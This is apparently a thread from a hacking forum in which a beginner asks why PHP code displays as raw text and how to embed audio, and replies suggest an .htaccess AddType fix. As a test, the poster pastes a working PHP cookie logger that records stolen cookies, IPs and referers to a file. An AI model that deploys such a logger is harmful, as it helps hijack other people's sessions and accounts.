Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

php just displaying

0 0

I tried my first crack at php, on a php server, and what I did all failed. I tried using something from here to test it out, so I used one of the cookie loggers one of you all had written,

$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date = date ("F j, Y, g:i a",mktime(date("g")+7));
$referer = getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: <b>'.$cookie.'</b><br> IP: <b>'.$ip.'</b><br> Date and Time: <b>'.$date.' EST</b><br> Referer: <b>'.$referer.'</b><br><br><br>');
fclose($fp);
?>```
what was displayed was 
'.$cookie.'
IP: '.$ip.'
Date and Time: '.$date.' EST
Referer: '.$referer.'

'); fclose($fp); ?>

I also tried 
```markup<title><?php print (date()); ?></title>```
for the title, and got that displayed as the title. I'm just learning from a downloaded e-book, at it might be outdated. It said that it would be ok to enclose things in just <? ?> but I didn't becasue I'd picked some up before hand and had never seen that done. Also, I installed xoops, which is a php based site manager, and it runs absolutely fine. What am I doing wrong?

Also, unrelated, how do you recomend embedding audio? I heard that the good, accepted way was to use 

```markup<object classid="clsid:bf25d5-8c17-4b23-bc80-d3488abddc6d" codebase="http://www.apple.com/qtactvex/qtplugin.cab" width="49" hight="16">
	<param name="src" value="foo.mp3" />
	<param name="controller" value="true" />
	<param name="autoplay" value="false" />```
but that isn't working either.

0 0

I just googled for 'mp3 in website', this is the first result and it might answer your second question ;)

0 0
  1. new text file
  2. copy and paste: AddType application/x-httpd-php php
  3. save as: .htaccess with the dot in front
  4. upload to the directory your php script is in
  5. make sure your file ends in .php (index.php)